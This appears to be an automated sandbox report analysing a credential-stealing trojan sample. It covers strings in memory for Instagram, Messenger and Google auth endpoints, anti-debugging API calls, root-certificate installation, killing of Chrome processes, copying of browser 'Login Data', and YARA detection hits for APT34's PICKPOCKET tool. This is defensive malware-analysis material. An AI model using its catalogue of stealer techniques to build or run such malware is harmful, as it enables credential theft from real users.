Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379681472.0000000003EB4000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlymdVA
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379486057.0000000003ED9000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/clouddevices
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.378363979.0000000003E97000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/clouddevicesY
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://www.googleapis.com/auth/h
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379486057.0000000003ED9000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/hangouts
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379486057.0000000003ED9000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379627052.0000000003EC0000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/hangoutsR
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379486057.0000000003ED9000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/meetings
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.378363979.0000000003E97000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/meetings$
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379627052.0000000003EC0000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/meetings6
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379599814.0000000003ED5000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/plus.peopK
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379599814.0000000003ED5000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/plus.peopKK
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwri
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379486057.0000000003ED9000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwrite
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.378363979.0000000003E97000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwriteVOs
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.378363979.0000000003E97000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/sierra85.0.
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.378363979.0000000003E97000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox&
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379540838.0000000003E9D000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379486057.0000000003ED9000.00000004.00000001.sdmp	String found in binary or memory: https://www.gstatic.com;
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/accept:
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/sec-fetch-site:
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.comsec-fetch-mode:
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/accept:
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/login/nonce/
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/origin:
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:

Source: C:\Users\user\AppData\Roaming\1618257864703.exe

Code function: 11_2_0040AE4D OpenClipboard,

11_2_0040AE4D

Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.368315810.000000000079A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Registers a new ROOT certificate

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_1001F780 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,

0_2_1001F780

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 7.2.26FF190E7AE0F7C7.exe.30f0000.6.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Author: unknown
Source: 6.2.26FF190E7AE0F7C7.exe.32b0000.6.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Author: unknown

PE file has a writeable .text section

Show sources

Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 26FF190E7AE0F7C7.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1001A000 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,	0_2_1001A000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10019DA0 LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,	0_2_10019DA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10019F60 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,	0_2_10019F60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10019FB0 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,	0_2_10019FB0
Source: C:\Users\user\AppData\Roaming\1618257864703.exe	Code function: 11_2_0040C516 NtQuerySystemInformation,	11_2_0040C516
Source: C:\Users\user\AppData\Roaming\1618257864703.exe	Code function: 11_2_0040C6FB memset,CreateFileW,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,	11_2_0040C6FB

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_00403660: DeviceIoControl,

0_2_00403660

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_00403E2C	0_2_00403E2C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_004093D5	0_2_004093D5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1000C073	0_2_1000C073
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1000B893	0_2_1000B893
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10006100	0_2_10006100
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_100099F0	0_2_100099F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10007200	0_2_10007200
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10016A1D	0_2_10016A1D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10009267	0_2_10009267
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10010AAC	0_2_10010AAC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10008350	0_2_10008350
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1000ABB0	0_2_1000ABB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1000B3C0	0_2_1000B3C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1000E3E0	0_2_1000E3E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10008400	0_2_10008400
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1001EC30	0_2_1001EC30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1000BC67	0_2_1000BC67
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1000C493	0_2_1000C493
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_100105F0	0_2_100105F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1001EE3B	0_2_1001EE3B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1000FFD1	0_2_1000FFD1
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1000C073	6_2_1000C073
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1000B893	6_2_1000B893
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10006100	6_2_10006100
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_100099F0	6_2_100099F0
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10007200	6_2_10007200
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10016A1D	6_2_10016A1D
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10009267	6_2_10009267
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10010AAC	6_2_10010AAC
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10008350	6_2_10008350
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1000ABB0	6_2_1000ABB0
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1000B3C0	6_2_1000B3C0
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1000E3E0	6_2_1000E3E0
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10008400	6_2_10008400
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1001EC30	6_2_1001EC30
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1000BC67	6_2_1000BC67
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1000C493	6_2_1000C493
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_100105F0	6_2_100105F0
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1001EE3B	6_2_1001EE3B
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1000FFD1	6_2_1000FFD1
Source: C:\Users\user\AppData\Roaming\1618257864703.exe	Code function: 11_2_00404BE4	11_2_00404BE4
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 21_2_00016A1E	21_2_00016A1E
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 21_2_0001963B	21_2_0001963B
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 21_2_0001A0C3	21_2_0001A0C3
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 21_2_0001B51C	21_2_0001B51C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 21_2_00019B7F	21_2_00019B7F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 21_2_0001A7BB	21_2_0001A7BB

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: String function: 10010594 appears 35 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: String function: 10010594 appears 35 times

Source: 1618257864703.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1618257864703.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameVBCABLE_ControlPanel.exeJ vs SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.369261894.0000000002B10000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Binary or memory string: OriginalFilenameVBCABLE_ControlPanel.exeJ vs SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior

Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 00000000.00000002.368875483.0000000002690000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000007.00000002.384812793.00000000025A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000002.425171659.00000000026C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe.10000000.6.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 6.2.26FF190E7AE0F7C7.exe.10000000.11.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 7.2.26FF190E7AE0F7C7.exe.25a0000.4.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 7.2.26FF190E7AE0F7C7.exe.10000000.11.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 6.2.26FF190E7AE0F7C7.exe.26c0000.2.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 7.2.26FF190E7AE0F7C7.exe.25a0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 6.2.26FF190E7AE0F7C7.exe.26c0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe.2690000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe.2690000.4.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 7.2.26FF190E7AE0F7C7.exe.30f0000.6.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 6.2.26FF190E7AE0F7C7.exe.32b0000.6.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html

Source: classification engine

Classification label: mal93.bank.troj.spyw.evad.winEXE@32/37@98/2

Source: C:\Users\user\AppData\Roaming\1618257864703.exe

Code function: 11_2_0040CE93 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,

11_2_0040CE93

Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe

Code function: 21_2_00011058 CoCreateInstance,

21_2_00011058

Source: C:\Users\user\AppData\Roaming\1618257864703.exe

Code function: 11_2_0040D9FC FindResourceW,SizeofResource,LoadResource,LockResource,

11_2_0040D9FC

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe

File created: C:\Users\user\AppData\Local\Login Data1618257834647

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6744:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello002
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6940:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5900:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7052:120:WilError_01

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

File created: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe

Jump to behavior

Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Roaming\1618257864703.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")

Source: C:\Windows\SysWOW64\msiexec.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Virustotal: Detection: 75%
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Metadefender: Detection: 25%
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	ReversingLabs: Detection: 64%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe'
